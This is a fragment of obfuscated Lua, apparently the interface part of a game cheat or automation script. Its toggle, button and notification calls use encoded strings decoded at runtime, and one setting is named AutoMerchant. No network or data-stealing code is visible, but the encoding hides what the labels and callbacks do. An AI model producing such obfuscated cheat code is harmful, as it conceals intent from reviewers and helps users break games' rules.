end});v52:CreateToggle({[v7("\3\186\227\63","\90\77\219\142")]=v7("\199\17\53\54\12\37\111\255\68\12\60\94\4\114\231\10\53","\26\134\100\65\89\44\103"),[v7("\210\226\60\47\166\240\224\59","\196\145\131\80\67")]=function(v121) v24.AutoMerchant=v121;end});v52:CreateButton({[v7("\48\177\11\13","\136\126\208\102\104\120")]=v7("\90\159\215\3\129\93\42","\49\24\234\174\35\207\50\93"),[v7("\47\243\241\132\115\13\241\246","\17\108\146\157\232")]=v43});v15:Notify({[v7("\127\202\0\225\42","\200\43\163\116\141\79")]="W",[v7("\156\57\51\151\181\250\247","\131\223\86\93\227\208\148")]=v7("\201\64\165\163\14\245\202\86\246\157\20\187\228\4","\213\131\37\214\214\125"),[v7("\2\62\55\190\245\47\36\43","\129\70\75\69\223")]=4 + 0 });
